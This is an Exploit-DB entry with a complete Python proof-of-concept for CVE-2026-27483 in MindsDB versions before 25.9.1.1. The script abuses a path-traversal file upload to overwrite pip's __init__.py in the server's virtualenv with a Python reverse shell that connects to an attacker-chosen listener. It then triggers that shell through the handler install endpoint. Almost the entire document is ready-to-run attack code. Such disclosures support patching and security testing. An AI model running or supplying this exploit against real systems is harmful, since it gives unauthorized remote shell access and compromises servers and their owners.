MindsDB 25.9.1.1 - Path Traversal

EDB-ID:

52547




Platform:

Multiple

Date:

2026-05-04


# Exploit Title: MindsDB  25.9.1.1 - Path Traversal 
# Date: 06-03-2026
# Exploit Author: Lohitya Pushkar (thewhiteh4t)
# Vendor Homepage: https://mindsdb.com/
# Software Link: https://github.com/mindsdb/mindsdb
# Version: < 25.9.1.1
# Tested on: Arch Linux
# CVE : CVE-2026-27483
# Original Advisory: https://github.com/mindsdb/mindsdb/security/advisories/GHSA-4894-xqv6-vrfq
# Vulnerability Discovery: XlabAITeam

import argparse
import random
import re
import string
import sys

import requests
from packaging.version import Version

PIP_PATH = "../../../../../../venv/lib/python3.10/site-packages/pip/__init__.py"
HANDLER = "anomaly_detection"  # query /api/handlers/ -> not installed handlers

BANNER = """
-------------------------------------
--- CVE-2026-27483 ------------------
--- MindsDB Path Traversal to RCE ---
-------------------------------------

[>] Found By : XlabAITeam
[>] PoC By   : Lohitya Pushkar (thewhiteh4t)
"""

try:
    parser = argparse.ArgumentParser()
    parser.add_argument("-rh", default="127.0.0.1", help="Target host")
    parser.add_argument("-rp", default="47334", help="Target port")
    parser.add_argument("-lh", help="Listener host")
    parser.add_argument("-lp", default="4444", help="Listener port")
    parser.add_argument("-u", help="Username")
    parser.add_argument("-p", help="Password")
    args = parser.parse_args()

    rhost = args.rh
    rport = args.rp
    lhost = args.lh
    lport = args.lp
    user = args.u
    pswd = args.p

    base_url = f"http://{rhost}:{rport}"

    print(BANNER)
    print(f"[>] Target   : {base_url}")
    print(f"[>] LHOST    : {lhost}")
    print(f"[>] LPORT    : {lport}\n")

    def login(username, password):
        r = requests.post(
            f"{base_url}/api/login", json={"username": username, "password": password}
        )
        if r.status_code == 200 and "token" in r.text:
            token = r.json().get("token")
            print("[+] Login successful!")
            return token
        print("[!] Login failed : ", r.status_code)
        print(f"---\n{r.text}\n---")
        return None

    print("[*] Checking status...\n")
    r = requests.get(f"{base_url}/api/status")

    if r.status_code != 200:
        print("[-] Status code :", r.status_code)
        print(f"---\n{r.text}\n---")
        sys.exit()

    status_json = r.json()
    ver = status_json["mindsdb_version"]
    auth = status_json["auth"]["http_auth_enabled"]

    print(f"[*] MindsDB Version : {ver}")
    auth_headers = {}

    ver_clean = Version(re.sub(r"[a-zA-Z].*$", "", ver))
    if ver_clean < Version("25.4.1.0"):
        print(
            f"[!] Version {ver} < 25.4.1.0 — may use Python 3.8/3.9, PoC targets 3.10, manually edit PIP_PATH and try again."
        )
        sys.exit(0)
    if ver_clean >= Version("25.9.1.1"):
        print(f"[!] Version {ver} is patched (>= 25.9.1.1). Aborting.")
        sys.exit(0)

    if auth:
        if not user or not pswd:
            print("[!] Auth is enabled. Provide --username and --password.")
            sys.exit()
        token = login(user, pswd)
        if not token:
            sys.exit()
        auth_headers = {"Authorization": f"Bearer {token}"}
    else:
        print("[*] Auth disabled — proceeding unauthenticated")

    shell_pl = f'''#!/usr/bin/env python3

import os,pty,socket
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("{lhost.strip()}",{lport.strip()}))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
pty.spawn("/bin/sh")
'''.replace("\n", "\r\n")

    fname = "".join(random.choices(string.ascii_lowercase, k=8))

    payload = {"name": fname, "source": fname, "source_type": "file"}

    infile = {"file": (PIP_PATH, shell_pl, "text/plain")}

    print("[*] Uploading payload :", fname)
    pr = requests.put(
        f"{base_url}/api/files/{fname}",
        data=payload,
        files=infile,
        headers=auth_headers,
    )

    if pr.status_code == 400:
        print("[+] Payload uploaded!")
    else:
        print("[-] Payload upload request :", pr.status_code)
        print(f"---\n{pr.text}\n---")
        sys.exit()

    print("[*] Triggering payload...")
    r = requests.post(
        f"{base_url}/api/handlers/{HANDLER}/install", json={}, headers=auth_headers
    )

except Exception as exc:
    print("[-] Exception :", exc)
except KeyboardInterrupt:
    sys.exit()